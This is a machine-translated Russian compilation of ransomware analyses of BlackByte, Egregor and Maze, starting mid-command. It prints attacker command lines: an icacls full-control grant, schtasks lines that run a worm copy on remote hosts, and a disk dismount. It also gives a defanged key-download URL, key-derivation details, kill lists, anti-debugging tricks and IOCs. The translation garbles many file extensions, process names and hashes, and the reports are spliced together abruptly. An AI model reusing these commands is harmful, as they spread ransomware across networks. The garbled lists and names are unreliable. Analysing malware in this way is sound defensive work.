    C:\Windows\System32\icacls. exe» «{ПИСЬМО ДИСКА}:*» /grant Everyone:F /T /C /Q

    BlackByte: червь

    Эта программа-вымогатель также может быть червем. Сначала он проверяет, существует ли файл %AppData%\. Если этот файл не существует, это означает, что программа-вымогатель еще не заразила сеть.

    Рис. 8. После создания дампа расшифрованные сборки .NET сохраняются на диске, и мы можем приступить к их анализу.

    Когда функция червя вызывается, она сначала спит в течение 10 секунд, а затем запрашивает не менее 1000 имен хостов в домене из активного каталога.

    Рисунок 9: Чтобы получить все имена компьютеров в сети, BlackByte пытается получить значение по умолчаниюNamingContext из RootDSE с сервера Active Directory, затем фильтрует объекты в Active Directory, идентифицируя их как компьютеры, и извлекает до 1000 записей.

    Он перечисляет возвращенную запись имен хостов, отправляет магический пакет пробуждения по локальной сети, а затем проверяет связь с целевыми хостами, чтобы убедиться, что они живы. Ниже приведена процедура червя и поток выполнения:

    .

    Рис. 10. Схема выполнения программы-червя

     

    Затем BlackByte заражает хост, копируя себя по пути \c$\Users\Public\obamka.js (если у него есть права администратора) или \Users\Public\obamka.js, а затем создает запланированная задача на удаленном хосте для выполнения файла.

    schtasks.exe <удаленный хост> /TN шутка /TR \"wscript.exe C:\\Users\\Public\\obamka.js\" /sc раз /st 00:00 /RL ВЫСОКИЙ
    schtasks.exe /S <удаленный хост> /Run /TN шутка

    Затем BlackByte создает файл маркера заражения на целевом хосте по пути c:\Users\Public\blockator.

     

    BlackByte: процедура шифрования

    Что нам показалось интересным в этой программе-вымогателе, так это то, что она изначально загружает файл .PNG файл по ссылке hxxp://45. 9.148.114/forest.png, который содержит ключ, который будет использоваться позже для шифрования файлов. Если программа-вымогатель не сможет загрузить ключ, произойдет сбой, и зараженная система не будет зашифрована.

    Рис. 11. Неустранимая ошибка исключения, когда программе-вымогателю не удалось загрузить файл .png

    Загруженный файл на самом деле не является файлом изображения PNG, вместо этого:

    • Первые 40 байтов — это необработанный ключ, используемый для шифрования файлов пользователя, он зашифрован с помощью 3DES.
    • Последние 32 байта содержат ключ 3DES, используемый для расшифровки первых 40 байт необработанного ключа.
    • Затем необработанный ключ проходит через функцию получения PBKDF2 для получения 128-битного ключа AES и вектора инициализации для алгоритма AES, используемого для шифрования пользовательских файлов.
    • Этот необработанный ключ также повторно зашифрован с использованием RSA с открытым ключом, встроенным в модуль и отображаемым в примечании о выкупе.
    • Злоумышленник может расшифровать этот ключ, используя свой закрытый ключ, но этот ключ один и тот же — при условии, что пользователь всегда получает один и тот же «лес.файл png. Предположительно файл forest.png периодически подменяется.

    Первые 40 байт файла PNG — это ключ (зашифрованный в TripleDES), который позже использовался для шифрования файла вымогателем.

    Рисунок 12: Зашифрованный ключ TripleDES в первых 40 байтах файла

    Ключ TripleDES для расшифровки ключа находится в последних 32 байтах файла PNG.

    Рис. 13. Последние 32 байта файла PNG, выделенные как выделенные, являются КЛЮЧОМ для расшифровки зашифрованного ключа TripleDES

    Ниже приведен расшифрованный необработанный ключ:

    =hQ;d’%44eLHt!W8AU9y?(FO:

    Этот необработанный ключ затем повторно шифруется с помощью RSA с использованием открытого ключа, встроенного в модуль (показан ниже), а затем после шифрования ключ кодируется с помощью Base64.


    <модуль>
    wKUX7pbo9XM / Z2gWbVADG8yV7ZklXOSRPv / KvtJHLIBUPvNWgjmKeiIgT3f5h
    CxaxqUzCi0QrrIhVIzA0WM + mPY9CLfIFLhq90v8H / + VezQtqeajO5J4ilDbqut9Gh4x0ojVjC
    TF4 / Q1Mxk125Af3D8IZQnXAw5uQ / uGXqP8e3E ​​=

    <экспонент> AQAB

    Зашифрованный необработанный ключ заменяется в заполнителе ключа записки с требованием выкупа, где он отображается.

    Рисунок 14: Записка о выкупе

    После загрузки и расшифровки необработанного ключа он будет получен необработанный ключ с использованием реализации Rfc2898DeriveBytes с солевым массивом байтов {0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08} и с 1000 итераций

    Рис. 15: Функция формирования ключа

    Рисунок ниже поможет визуализировать процедуру шифрования:

    Рисунок 16: Процедура шифрования

    После этого программа-вымогатель начнет перечислять диски (за исключением дисковода для компакт-дисков) и добавлять их в список. Он гарантирует, что имеет полный контроль над целевыми дисками, изменив свой контроль доступа на полный.

    После сбора всех дисков (локальных и удаленных) и общих папок на удаленном хосте программа-вымогатель начнет перемещаться по нему и искать все целевые файлы.

    Рисунок 17: Процедура обхода файла BlackByte

    Избегает шифрования файлов с атрибутом системного файла, а также имен файлов и расширений файлов из этого списка:

    Имена файлов:

    обамка.js

    thumbs.db

    ntdetect.com

    ntuser.dat.log

    bootnxt

    bootsect.bak

    нтлдр

    autoexec.bat

    Корзина.Корзина

    iconcache.db

    загрузчик

    бутфонт.ящик

    Расширения файлов:

    мсиллог

    журнал

    лдф

    замок

    тема

    мси

    сис

    wpx

    комплект

    нареч

    МСЦ

    скр

    ключ

    ико

    длл

    хта

    рабочий столтемапак

    номедия

    мсу

    ртп

    мсп

    идентификатор

    ани

    386

    диагностика

    бин

    мод

    икс

    ком

    HLP

    спл

    нл

    кабина

    исполняемый файл

    диагностика

    ic

    окх

    от

    прф

    тематический пакет

    мсстили

    icns

    МПа

    дрв

    курс

    диагкаб

    команда

    шс

       

    Если программа-вымогатель обнаруживает расширение файла виртуального жесткого диска. vhd и .vhdx, он попытается размонтировать эти диски с помощью команды PowerShell:

    .
    powershell.exe Dismount-DiskImage -ImagePath <путь VHD>

    Целевой файл для шифрования подвергается фильтрации по размеру файла:

    • Если файл больше 150 МБ
      • зашифровать первые 50 МБ и последние 50 МБ файла
    • Если файл больше 15 МБ
      • зашифровать первые 5 МБ и последние 5 МБ файла
    • Если файл больше 3 МБ
      • зашифровать первый 1 МБ и последний 1 МБ файла
    • Если размер файла меньше 3 МБ

    Для шифрования файла используется алгоритм симметричного ключа AES с использованием исходных ключей RFC2898 из файла .png файл.

    Ниже приведен фрагмент кода процедуры шифрования файлов.

    Рисунок 18: Процедура шифрования BlackByte

    В BlackByte Ransomware — Часть 2 мы покажем вам, как мы деобфусцировали программу запуска JScript, декомпилировали код программы-вымогателя и проанализировали ее внутреннюю работу.

    МОК

    Имя файла

    Описание

    SHA256

    Обамка.js

    Средство запуска Jscript

    884e96a75dc568075e845ccac2d4b4ccec68017e6ef258c7c03da8c88a597534

    лес.png

    Ключевой файл

    9bff421325bed6f1989d048edb4c9b1450f71d4cb519afc5c2c90af8517f56f3

    yk0pddk

    Программа-вымогатель BlackByte

    d3efaf6dbfd8b583babed67046faed28c6132eafe303173b4ae586a2ca7b1e90

    вылвз3ле.DLL

    Загрузчик BlackByte

    92ffb5921e969a03981f2b6991fc85fe45e07089776a810b7dd7504ca61939a3

    2edpcniu.dll

    Загрузчик BlackByte

    f8efe348ee2df7262ff855fb3984884b3f53e9a39a8662a6b5e843480a27bd93

    Сеть

     hxxp://45. 9.148.114/forest.png

    Программа-вымогатель Egregor — углубленный анализ

    Minerva Labs провела подробное исследование программы-вымогателя Egregor с целью подробного анализа того, как она работает для заражения цели.Лучшее знание методов злоумышленников может помочь экспертам по безопасности обнаруживать и устранять новые угрозы, что особенно важно, учитывая недавнюю эволюцию программ-вымогателей. В рамках данного исследования мы попытались определить, какие приемы уклонения использует вредоносное ПО.

    Недавний всплеск программ-вымогателей Egregor и сходство кода с штаммами программ-вымогателей Sekhmet и Maze наводят нас на мысль, что они, вероятно, имеют одинаковую кодовую базу. Кроме того, схожие приемы обфускации кода используют Maze и Egregor, которые замедляют процесс анализа и мешают исследователям.

    Сообщения в блоге об Эгрегоре детализируют разную степень запутанности. В нашем случае и загрузчик, и сама программа-вымогатель были сильно запутаны, что вынудило нас написать сценарии деобфускации, упрощающие процесс анализа.

    Погрузчик

    Программа-вымогатель, с которой мы столкнулись, представляет собой DLL-файл с именем b.dll. Файл был выполнен вручную с помощью следующей командной строки:

    Анализ дизассемблированного кода показывает, что он сильно запутан методами, основанными на компиляторе, что делает статический анализ кода довольно трудоемким.

    Например, см. ниже функцию DllRegisterServer, которую злоумышленник использует для запуска программы-вымогателя, в графическом представлении IDA:

     

    Обфускация, которую использует Эгрегор, аналогична той, что используется в программе-вымогателе Maze. Нам удалось изменить сценарий деобфускации Blueliv’s Maze (сообщение в блоге и исходный скрипт можно найти здесь), чтобы он соответствовал шаблонам обфускации Egregors, что позволило упростить анализ программ-вымогателей.

    Загрузчик проверяет наличие командной строки «—nop» и завершает работу, если она существует.

    Что касается дальнейшей распаковки, большой блок данных расшифровывается со следующими шагами:

    • Большой двоичный объект декодируется методом xor с помощью жестко запрограммированного ключа (0x4 в нашем примере).
    • Затем данные, подвергнутые операции xor, декодируются в формате Base64 с помощью функции Windows API CryptStringToBinaryA.
    • Для алгоритма ChaCha20 инициализируется жестко запрограммированный ключ и IV, который затем используется для окончательного расшифрования полезной нагрузки. Авторы вредоносного ПО решили изменить количество циклов вращения ключа с 20 по умолчанию до 4.

    После расшифровки второй полезной нагрузки, файла DLL, он копируется в новое выделение, созданное с помощью VirtualAlloc с разрешениями страницы RWX.

    Последний этап начального загрузчика — подготовка полезной нагрузки в памяти. Вредонос рефлективно загружает расшифрованную полезную нагрузку и использует функцию CreateThread для передачи выполнения на следующий этап.

    На следующем этапе командная строка анализируется в поисках параметра -p, который содержит пароль, используемый для расшифровки бинарного файла программы-вымогателя.Программа-вымогатель расшифровывается с помощью потокового шифра, некоторые константы которого совпадают с кроличьим шифром:

    .

     

     

    Программа-вымогатель Код:
    Программа-вымогатель скомпилирована в виде DLL-файла с единственным экспортируемым файлом «DllEntryPoint». Функция создает поток, выполняющий основную подпрограмму программы-вымогателя:

    .

     

    Перед запуском вредоносной процедуры вымогателя вызывается функция для определения локали рабочей станции.Вымогатель использует три разные функции Windows API, чтобы убедиться, что он не шифрует компьютер, расположенный в России или любой другой стране СНГ:

    .

    Эгрегор прекратит работу, если будет найдена любая из следующих локалей:

     

    Код региона

    Страна

    0x843

    Узбекский — Кириллица

    0x819

    Россия — Молдова

    0x440

    кыргызский — кириллица

    0x442

    Туркменский

    0x82C

    Азербайджанский

    0x423

    Белорусский

    0x42B

    Армянский

    0x443

    Узбекский — Латинский

    0x43F

    Казахский

    0x437

    Грузинский

    0x42C

    Азербайджанский

    0x818

    Румынский — Молдова

    0x444

    татарский

    0x428

    Таджикский

     

    После проверки локали конфигурация выкупа будет расшифрована из буфера, расположенного в разделе данных исполняемого файла. Первые 8 байт зашифрованной конфигурации начинаются с заголовка PNG, который анализатор пропускает перед расшифровкой. Последующее DWORD содержит размер конфигурации для расшифровки. Начиная со смещения 12, конфигурация будет расшифрована с использованием циклически модифицированного ChaCha20 и жестко закодированного ключа и IV.

    Зашифрованная конфигурация в памяти:

     

    Декомпиляция функции инициализации класса конфигурации:

    Конфигурация содержит несколько интересных настроек:

    • Записка о выкупе.
    • Список процессов, которые необходимо завершить.
    • Ключевые слова, занесенные в черный список для алгоритма прекращения обслуживания.
    • Жестко закодированный 2048-битный открытый ключ RSA, который используется для схемы шифрования файлов.
    • Флаги наличия удаленных адресов.

    Для создания отпечатка зашифрованной рабочей станции Эгрегор использует несколько функций API для извлечения информации о машине:

     

     

    Программа-вымогатель использует функции API GetLogicalDriveStrings и GetDiskFreeSpace для определения имен и типов логических дисков, подключенных к устройству, а также объема доступного на них свободного места.

    Открытый ключ RSA программы-вымогателя в памяти, сохраненный в зашифрованной конфигурации:

    Для каждого выполнения генерируется пара закрытого и открытого ключей. Открытый ключ используется для шифрования симметричных ключей, которые впоследствии будут использоваться для шифрования каждого файла. Уникальный симметричный ключ генерируется для каждого файла, подлежащего шифрованию.

    Схема генерации ключа Эгрегора следующая:

    • 2048-битная пара ключей RSA создается с помощью CryptGenKey — это сеансовый ключ.
    • Затем ключ экспортируется с помощью API CryptExportKey.
    • Экспортированный закрытый ключ шифруется с помощью ChaCha с использованием случайно сгенерированного ключа и IV.
    • Ключи ChaCha шифруются с помощью функции CryptEncrypt и встроенного в конфигурацию открытого ключа RSA.
    • Зашифрованный ключ ChaCha и зашифрованный сеансовый ключ сохраняются на диск по жестко заданному пути, в нашем случае это %ProgramData%\dtb. dat.

    Стоит отметить, что программа-вымогатель шифрует сеансовый ключ с помощью того же протокола, который используется для расшифровки полезной нагрузки программы-вымогателя (Rabbit Cipher).

    Программа-вымогатель остановит определенные процессы и службы перед шифрованием машины. Список жестко заданных имен процессов хранится в зашифрованном файле конфигурации, и вредоносное ПО использует NtQuerySystemInformation для перечисления запущенных процессов и завершает их с помощью функции NtTerminateProcess.

    Список процессов, которые будут завершены, в нашем образце (список также будет доступен в разделе IOC):

    Что касается алгоритма остановки службы, конфигурация программы-вымогателя содержит список строк, которые будут использоваться для определения того, какую службу следует остановить.Имена сервисов будут перечислены с помощью API-функции EnumServicesStatus. Любое имя службы, содержащее строки из черного списка, будет остановлено с помощью Windows Service Control Manager API.

    Список ключевых слов служб в конфигурации:

    Эгрегор имеет возможность связываться с жестко запрограммированными URL-адресами HTTP. Если смещение 0x3a31e и 0x32fb в конфигурации не содержит 0, программа-вымогатель будет обращаться к IP-адресу/DNS-именам (которые также встроены в конфигурацию) и декодировать их содержимое, используя ту же комбинацию модифицированного ChaCha20/Base64, которая использовалась ранее.

    Здесь можно найти сценарий деобфускации IDAPython.

    МОК:

    Хэши:

    b9b71eb04d255b21e3272eef5f4c15d1c208183748dfad3569efd455d87879c6 (загрузчик эгрегора)

    8d5ad342ea9fde48920a

    0be432236d074d34f791b5c96ec3a418a1bbbd5

    (распакованный вымогатель из памяти)

    Файлы:

    %ProgramData%\dtb.dat

    ВОССТАНОВЛЕНИЕ-ФАЙЛОВ.TXT

    Завершенные процессы:

     

    мсфтескл. исполняемый файл

    agntsvc.exe

    tbirdconfig.exe

    excel.exe

    thebat.exe

    procmon.exe

    procexp.exe

    sqlagent.exe

    isqlplussvc.exe

    mydesktopqos.exe

    infopath.exe

    steam.exe

    прокмон64.исполняемый файл

    procexp64.exe

    sqlbrowser.exe

    xfssvccon.exe

    ocomm.exe

    msaccess.exe

    thebat64.exe

    ipython.exe

    wpython.exe

    sqlwriter.exe

    sqlservr.exe

    mysqld.exe

    мспб.исполняемый файл

    Thunderbird.exe

    Python. exe

    dumpcap.exe

    oracle.exe

    dbeng50.exe

    mysqld-nt.exe

    onenote.exe

    visio.exe

    QBW64.exe

    synctime.exe

    ocssd.exe

    ocautoupds.исполняемый файл

    mysqld-opt.exe

    Outlook.exe

    winword.exe

    firefoxconfig.exe

    sqlservr.exe

    dbsnmp.exe

    encsvc.exe

    mydesktopservice.exe

    powerpnt.exe

    wordpad.exe

    скбкоресервис.исполняемый файл

    QBW32.exe

    Каталожные номера:

    Лабиринт программ-вымогателей | Блог McAfee

    КРАТКОЕ ОПИСАНИЕ

    Программа-вымогатель The Maze, ранее известная в сообществе как программа-вымогатель ChaCha, была обнаружена 29 мая 2019 года Джеромом Сегурой[1].

    Основная цель программы-вымогателя — зашифровать все файлы, которые она может найти в зараженной системе, а затем потребовать выкуп за восстановление файлов.Однако наиболее важной характеристикой Maze является угроза, которую авторы вредоносных программ дают жертвам, что, если они не заплатят , они выложат информацию в Интернет[2].

    Эта угроза не была пустой, так как файлы одной компании действительно были опубликованы в Интернете. Несмотря на то, что компания подала в суд, ущерб уже был нанесен. Это поведение все чаще наблюдается в новых программах-вымогателях[3], таких как Sodinokibi, Nemty, Clop и других.

    В прошлом году[4] было показано, как программы-вымогатели будут двигаться в этом направлении, чтобы получать деньги от жертв, которые могут не захотеть платить за расшифровку.

    КАРТА ТЕЛЕМЕТРИИ

    РИСУНОК 1. КАРТА ИНФЕКЦИЙ ЛАБИРИНТА

    ВВЕДЕНИЕ

    29 октября была обнаружена кампания по распространению вредоносного ПО Maze среди итальянских пользователей. Исторически вредоносное ПО использовало различные методы для проникновения, в основном с помощью наборов эксплойтов, подключений к удаленному рабочему столу со слабыми паролями или через электронную почту или, как в случае с Италией, через различные агентства или компании[5], например, Итальянское агентство по доходам. Эти электронные письма поставлялись с вложением Word, которое использовало макросы для запуска вредоносного ПО в системе.

    Чаще всего использовались эксплойт-киты Fallout и Spelevo[6].

    Вредоносное ПО жестко запрограммировано с некоторыми уловками, чтобы предотвратить его реверсирование и затруднить статический анализ. В этом отчете рассматриваются эти средства защиты и поведение вредоносных программ в зараженной системе.

    Разработчики вставили сообщения, чтобы спровоцировать исследователей вредоносных программ, в том числе адрес электронной почты Лоуренса Абрамса, владельца «BleepingComputer», с которым они связались напрямую. Они очень активны в социальных сетях, таких как Twitter.

    McAfee защищает своих клиентов от угроз, о которых мы говорим в этом отчете, во всех своих продуктах, включая персональные антивирусы, конечные точки и шлюзы.

    ОБЗОР ЛАБИРИНА

    Вредоносное ПО представляет собой бинарный файл длиной 32 бита, обычно упакованный в виде EXE- или DLL-файла. Этот отчет посвящен файлу EXE.

    РИСУНОК 2. ИНФОРМАЦИЯ О ВРЕДОНОСНОМ ПО

    Дополнительные сведения об образце, использованном в этом отчете, приведены в этой таблице:

    ТЕХНИЧЕСКИЕ ДАННЫЕ

    Maze — это сложное вредоносное ПО, которое с самого начала использует некоторые приемы, чтобы помешать анализу.

    Вредоносная программа начинает подготавливать некоторые функции, которые, по-видимому, сохраняют адреса памяти в глобальных переменных для последующего использования в динамических вызовах, хотя на самом деле эти функции впоследствии не используются. Является ли это остаточным кодом, существующим в точке входа вредоносного ПО, или уловкой, направленной на то, чтобы ввести исследователей в заблуждение, остается предметом споров.

    РИСУНОК 3. СОХРАНЕНИЕ АДРЕСА ФУНКЦИЙ ДЛЯ ПОЗДНЕГО ИСПОЛЬЗОВАНИЯ ДИНАМИЧНЫМ СПОСОБОМ

    Позже вредоносная программа внедряется в большой блок мусорного кода, который также включает в себя некоторые элементы для расшифровки строк и важной информации для дальнейшего использования.На этом этапе вредоносное ПО использует некоторые приемы для обнаружения отладчиков.

    Самые важные из них:

    • Большое использование поля PEB « IsDebuggerPresent ». Это логическое поле, которое заполняется из Windows значением 1 (Истина), если приложение выполняется внутри отладчика, или 0 (Ложь), если это не так.

    РИСУНОК 4. ЧАСТОТНОЕ ИСПОЛЬЗОВАНИЕ ПОЛЯ PEB «ISDEBUGGEPRESENT» ДЛЯ ОПРЕДЕЛЕНИЯ, РАБОТАЕТ ЛИ ПРИЛОЖЕНИЕ В ОТЛАДЧИКЕ

    Если вредоносная программа обнаружит отладчик, она останется в бесконечном цикле, ничего не делая, тратя системные ресурсы.

    РИСУНОК 5. MAZE ЗАХВАТЫВАЕТ ОТЛАДЧИК, И ОСТАЕТСЯ РАБОТАТЬ, ТРАТЯ РЕСУРСЫ

    Вредоносная программа получает все процессы в системе, но игнорирует первый («неактивный процесс» в Windows, который является просто инструментом, позволяющим пользователю узнать, какой процент системных ресурсов используется). Используя имя каждого процесса, он создает собственное имя с пользовательским алгоритмом, а также хэш, который проверяется по жестко запрограммированному списку. Если хеш будет найден в этом списке, процесс будет завершен.

    РИСУНОК 6. ПРОВЕРКА ХЕШЕЙ ОТ НАЗВАНИЯ ПРОЦЕССОВ СИСТЕМЫ

    Например, процесс отладчика «x32dbg» пойман в этой точке:

    РИСУНОК 7. ПРОЦЕСС X32DBG, ПОЛУЧЕННЫЙ ВРЕДОНОСНОЙ ПРОГРАММОЙ С ХЭШЕМ

    Может завершить отладчик IDA, x32dbg, OllyDbg и другие процессы, чтобы избежать динамического анализа, закрыть базы данных, офисные программы и инструменты безопасности.

    Ниже показан неполный список процессов, которые можно взломать с помощью списка словарей, завершенных вредоносной программой:

    свалка.ехе -> 0x5fb805c5
    excel.exe -> 0x48780528
    fiddler.exe -> 0x5e0c05b1
    msaccess.exe -> 0x6a9c05ff
    туздЫ-nt.exe -> 0x79ec0661
    outlook.exe -> 0x615605dc
    pipanel.exe -> 0x5fb805c4
    procexp64 .exe -> 0x78020640
    procexp.exe -> 0x606805d4
    procmon64.exe -> 0x776e0635
    procmon.exe -> 0x600005c9
    python.exe -> 0x555ee0597
    taskkill.exe -> 0x6c2e0614
    Visio.exe -> 0x49780539
    Winword. exe -> 0x60d805d5
    x32dbg.exe -> 0x5062053b
    x64dbg.exe -> 0x50dc0542

    Этот краткий список показывает имя процесса, который нужно убить, и пользовательский хеш из специального имени, сгенерированного из исходного имени процесса.

    РИСУНОК 8. ФУНКЦИЯ TERMINATEPROCESS, ВЗЯТАЯ ИЗ ТАБЛИЦЫ ЭКСПОРТНЫХ АДРЕСОВ (EAT) KERNEL32 И ПРОХОДЯЩУЮ ПРОВЕРКУ ИМЯ ХЕША

    Вредоносное ПО убивает процесс с помощью функции «TerminateProcess», которую он получает из EAT (Export Address Table) модуля «kernel32.dll», чтобы увеличить запутанность, сравнивая имя с пользовательским хэшем, взятым из имени в больших заглавных буквах.

    РИСУНОК 9. ВЫЗОВ TO TERMINATEPROCESS ДИНАМИЧЕСКИМ СПОСОБОМ ОБФУСКАЦИИ ЭТОГО ВЫЗОВА

    Вредоносная программа вызывает функции Windows уникальным способом, чтобы способствовать запутыванию, то есть заставить первый процесс в системе использовать функцию «Process32FirstW». Однако вместо того, чтобы вызывать его напрямую, он помещает параметры, необходимые для функции, в стек, за которым следует адрес памяти с кодом операции «push», а затем совершает прямой переход к функции Windows.Когда функция завершается, Windows создает код операции «ret», затем получает последний адрес памяти, который вредоносное ПО запихнуло внутрь стека, возвращается на этот адрес и продолжает поток. Пример этого можно увидеть на этом изображении:

    РИСУНОК 10. СИЛЬНАЯ ОБФУСКАЦИЯ, ЧТОБЫ ПЫТАТЬСЯ ЗАМЕДЛИТЬ АНАЛИЗ И СДЕЛАТЬ ЕГО БОЛЕЕ СЛОЖНЫМ

    Еще одна уловка, используемая вредоносным ПО (в зависимости от образца), заключается в получении функции «DbgUIRemoteBreakin» с помощью функции «GetProcAddress», прежде чем использовать трюк, чтобы избежать подключения к ней отладчика во время выполнения[7].

    РИСУНОК 11. ПОЛУЧИТЕ DBGUIREMOTEBREAKIN, ИСПОЛЬЗУЯ GETPROCADDRESS, ЧТОБЫ ИЗБЕЖАТЬ АТАКИ ОТЛАДЧИКА

    Используемый здесь трюк — «VirtualProtect», чтобы дать адресу памяти функции «DbgUIRemoteBreakin» разрешение на запись в него:

    РИСУНОК 12. ПРЕДОСТАВЛЕНИЕ РАЗРЕШЕНИЙ НА ЗАПИСЬ В ПАМЯТЬ

    После получения разрешения, которое дается только на 1 байт, вредоносная программа исправляет этот байт со значением 0xC3 (код операции «ret») и восстанавливает предыдущие разрешения с помощью «VirtualProtect», опять же в том же адресе и байте, удаляя разрешение на запись.

    РИСУНОК 13. ИСПРАВЛЕНИЕ ФУНКЦИИ С ОПКОДОМ RET И ВОССТАНОВЛЕНИЕ РАЗРЕШЕНИЙ ПАМЯТИ

    Это сделано для того, чтобы избежать присоединения к нему отладчика во время выполнения. Таким образом, когда отладчик подключается к процессу внутри, система вызывает эту функцию, но вместо создания потока для запуска отладки код операции «ret» заставляет функцию вернуться, не создавая ее. Короче говоря, это препятствует правильному подключению отладчика. Это делается до перечисления системного процесса.

    Вредоносная программа проверяет язык машины с помощью функции «GetUserDefaultUILanguage» и сохраняет значение в стеке; она не проверяется автоматически после звонка, но важна позже.

    Maze создает мьютекс с именем «Global\x», где x — это специальное значение, уникальное для каждой машины. Например, на следующем снимке экрана (некоторая информация была удалена для анонимизации машины, используемой для анализа) приведен пример такого поведения. Это делается для того, чтобы избежать двух и более казней одновременно.

    РИСУНОК 14. СОЗДАНИЕ МЬЮТЕКСА ДЛЯ ИЗБЕЖАНИЯ ДВОЙНОГО ВЫПОЛНЕНИЯ. УНИКАЛЬНО НА МАШИНУ

    Вредоносное ПО после создания мьютекса вызывает функцию «GetLastError» для проверки на наличие двух ошибок:

    • 0x05 -> ERROR_ACCESS_DENIED. Если вредоносное ПО получает эту ошибку, это означает, что мьютекс уже существует в системе, но по какой-то причине вредоносное ПО не может получить к нему доступ (возможно, привилегии, политики и т. д.).
    • 0xb7 -> ОШИБКА_УЖЕ СУЩЕСТВУЕТ.Если вредоносное ПО получает эту ошибку, это означает, что мьютекс уже существует в системе и к нему можно получить доступ.

    Если происходит одно из вышеперечисленных событий, вредоносная программа продолжает выполняться, но не шифрует никакие файлы в системе и не использует какие-либо ресурсы машины. Это означает, что она появится в списке программ, используя 0% процессора.

    Значение мьютекса изменяется либо для каждого образца, либо периодически, чтобы избежать возможности создания против него вакцин. Вредоносная программа также имеет команду избегать «проблемы» с вакцинами, которая будет объяснена позже.

    После мьютекса вредоносная программа сверяет ранее сохраненный в стеке язык с, например, языком 0x419 (русский из РФ, ru-RU[8]).

    Проверки выполняются запутанным образом в нагромождении кода вредоносной программы (в виртуальной машине, используемой здесь, использовался испанский язык Испании (es-ES); это код 0xC0A, который появляется в стеке в скриншот):

    РИСУНОК 15. ПРОВЕРКА ЯЗЫКА С РУССКИМ ЯЗЫКОМ ИЗ РОССИЙСКОЙ ФЕДЕРАЦИИ

    Если язык соответствует любому из перечисленных ниже, вредоносная программа очистит память и выйдет из основного потока, не тратя ресурсов и не создавая файлов.

    • 0x419 -> ru-RU (русский из РФ)
    • 0x422 -> uk-UA (украинский из Украины)
    • 0x423 -> be-BY (белорусский из Беларуси)
    • 0x428 -> tg-Cyrl-TJ (Таджикский (кириллица из Таджикистана)
    • 0x42B -> hy-AM (армянский из Армении)
    • 0x42C -> az-Latn-AZ (азербайджанский (латиница из Азербайджана))
    • 0x437 -> ка-GE (грузинский из Грузии)
    • 0x43F -> kk-KZ (казахский из Казахстана)
    • 0x440 -> ky-KG (киргиз из Кыргызстана)
    • 0x442 -> tk-TM (туркмен из Туркменистана)
    • 0x443 -> uz-Latn-UZ (узбекский (латиница из Узбекистана))
    • 0x444 -> tt-RU (татарский из Российской Федерации)
    • 0x818 -> ro-MD (румынский из Молдовы, НЕ румынский из Румынии! )
    • 0x819 -> ru-MD (русский из Молдовы)
    • 0x82C -> az-Cyrl-AZ (азербайджанский (кириллица из Азербайджана))
    • 0x843 -> uz-Cyrl-UZ (узбекский (кириллица из Узбекистана))
    • 0x7C1A -> ср (сербский)
    • 0x6C1A -> sr-Cyrl (сербский в кириллице)
    • 0x1C1A -> sr-Cyrl-BA (сербский (кириллица из Боснии и Герцеговины))
    • 0x281A -> sr-Cyrl-RS (сербский (кириллица из Сербии))
    • 0x81A -> sr-Latn-CS (сербский (латиница)) (код этого языка начинается с Windows Vista)

    Вредоносная программа пытается удалить теневые тома в системе с помощью файла «wmic.exe» с переключателями «shadowcopy» и «delete». До этого зловред получает функцию «WoW64DisableWow64FsRedirection» с «GetProcAddress» и использует ее, чтобы избежать перенаправления по умолчанию в 64-битных операционных системах и вызывает ее динамически.

    Вредоносная программа дважды пытается удалить теневые копии: один раз перед шифрованием файлов в зараженной системе и второй раз после их шифрования.

    Это выполнение выполняется с помощью функции «CreateProcessW», но для повышения уровня обфускации вредоносное ПО запускается с помощью этой команды:

    РИСУНОК 16.УДАЛЕНИЕ ТЕНЕВЫХ КОПИЙ В ЗАРАЖЕННОЙ СИСТЕМЕ КОМАНДОЙ WMIC

    Как видно на изображении выше, вредонос использует команду с названием папок, не существующих по умолчанию в Windows, кроме «Windows», «system32» и «wbem». Он входит в эти папки, но затем быстро выходит из них, используя команду «..», что означает, что он возвращается к предыдущей папке в пути.

    Например, сначала заходит в папки «ydw» и «fdygg», а потом возвращается в корень установочного модуля Windows с двумя «.». команды, ведущие в данном случае к «C:\». Позже он объединяется с папкой «Windows» и продолжает вести себя так же, чтобы, наконец, войти в «system32», где он вызывает программу «wmic.exe» с переключателями для удаления теневых томов. Это делается для того, чтобы попытаться запутать этот вызов, хотя такое подозрительное поведение может привести к тому, что антивирусная программа в любом случае остановит его, но это доказательство того, что кодировщики вредоносных программ обладают навыками программирования и хорошо понимают поведение Windows.

    Важно понимать, что этот «путь», используемый в команде с несуществующими папками, является случайным и не требует использования одинакового количества папок для обфускации.

    После процесса удаления вредоносное ПО получает функцию «Wow64RevertWow64FsRedirection» с помощью функции «GetProcAddress» и вызывает ее динамически, чтобы оставить систему в том же состоянии, что и раньше.

    РИСУНОК 17. ВОССТАНОВЛЕНИЕ ПЕРЕНАПРАВЛЕНИЯ FS В 64-РАЗРЯДНЫХ ОПЕРАЦИОННЫХ СИСТЕМАХ

    Maze влияет и на сетевые ресурсы, используя функции «WNetOpenEnumW», «WNetEnumResourceW», «WNetCloseEnum» и «WNetAddConnection2W».

    РИСУНОК 18.ПЕРЕЧИСЛЕНИЕ СЕТЕВЫХ РЕСУРСОВ ДИСКА ДЛЯ ЗАШИФРОВКИ ВНУТРИ НИХ ФАЙЛОВ

    Вредоносное ПО использует два алгоритма для шифрования файлов: ChaCha, основанный на симметричном алгоритме Salsa20, и для защиты асимметричный алгоритм RSA

    При каждом запуске вредоносная программа создает открытый BLOB из одного ключа RSA, который будет использоваться для шифрования части, содержащей информацию для расшифровки файлов, и один частный BLOB с ключом RSA, который позволяет расшифровывать информацию, зашифрованную с помощью общедоступного RSA. блоб, созданный ранее.

    РИСУНОК 19. ЭКСПОРТ BLOB-объекта открытого ключа RSA, сгенерированного во время выполнения

    РИСУНОК 20. ЭКСПОРТ BLOB-объекта закрытого ключа RSA, сгенерированного во время выполнения

    Как и другие программы-вымогатели, это вредоносное ПО имеет встроенный публичный BLOB-объект RSA, который будет импортирован для защиты частного BLOB-объекта RSA жертвы. Только у разработчиков вредоносного ПО есть частный BLOB-объект RSA для расшифровки общедоступного BLOB-объекта RSA.

    РИСУНОК 21. ИМПОРТ ПУБЛИЧНОГО BLOB-объекта RSA ДЛЯ РАЗРАБОТЧИКОВ ВРЕДОНОСНОГО ПО

    Этот ключ защищен криптографией с использованием ключа из 32 бит и iv из 8 байт с использованием функции «CryptGenRandom», чтобы избежать дампов памяти, но позже перед использованием его необходимо будет расшифровать.

